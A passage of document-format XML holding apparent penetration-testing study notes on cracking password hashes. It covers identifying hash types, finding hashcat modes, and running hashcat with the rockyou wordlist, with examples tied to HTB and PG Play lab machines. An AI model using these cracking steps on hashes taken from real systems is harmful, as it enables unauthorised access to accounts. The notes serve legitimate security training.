    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Important: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you can't crack a hash, just try and online hash cracker. Like for the BTRSys2.1 PG Play, the MD5 hash couldn't be cracked on Kali, but an online hash cracker got it (crackstation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E08">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ot1oc37mjz6f" w:id="252"/>
      <w:bookmarkEnd w:id="252"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find the mode needed for a hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the hash. In the first characters of the hash, you might see something in between dollar signs like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$krb15rep$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste that text, and run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat ../example-hashes | grep [INSERT TEXT]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or go to this website (</w:t>
      </w:r>
      <w:hyperlink r:id="rId618">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hashcat.net/wiki/doku.php?id=example_hashes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and use CTRL + F on the first few letters of the hash to find the mode for the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you get a result, that means hashcat recognizes your hash type. So run this to find the mode for that hash type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat ../example-hashes | grep -B5 [INSERT TEXT]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will look at the 5 lines before your GREP, which will include the mode information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you see the "MODE" in the output, now you can run hashcat with your mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="490" name="image484.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image484.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId619"/>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1E12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Whole process seen here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Blackfield HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E15">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E16">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bcrypt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="649"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have something like</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> $2a$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$2y$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or any character instead of a or y, then you likely have bcypt. This is code -m 3200 for hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Say you have a hash like $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First find the type of hash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashid '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="526"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put the hash around quotes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="526"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will give you a list of possible hashes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="526"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId620">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then find the code that hashcat uses for that hash type:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat --help | grep "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="841"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace hashname with the hash type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then use hashcat with that code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3200 '&lt;INSERT HASH&gt;'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1497"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace 3200 with you code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1497"/>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&lt;INSERT HASH&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1497"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to keep the single quotation marks around the hash instead of double quotes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1497"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this if you have hashes saved in hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what output looks like when it's cracked:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4205288" cy="2450563"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="380" name="image388.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image388.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId621"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4205288" cy="2450563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever want to revisit a hash, do the same hashcat command but just append </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--show</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the end:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
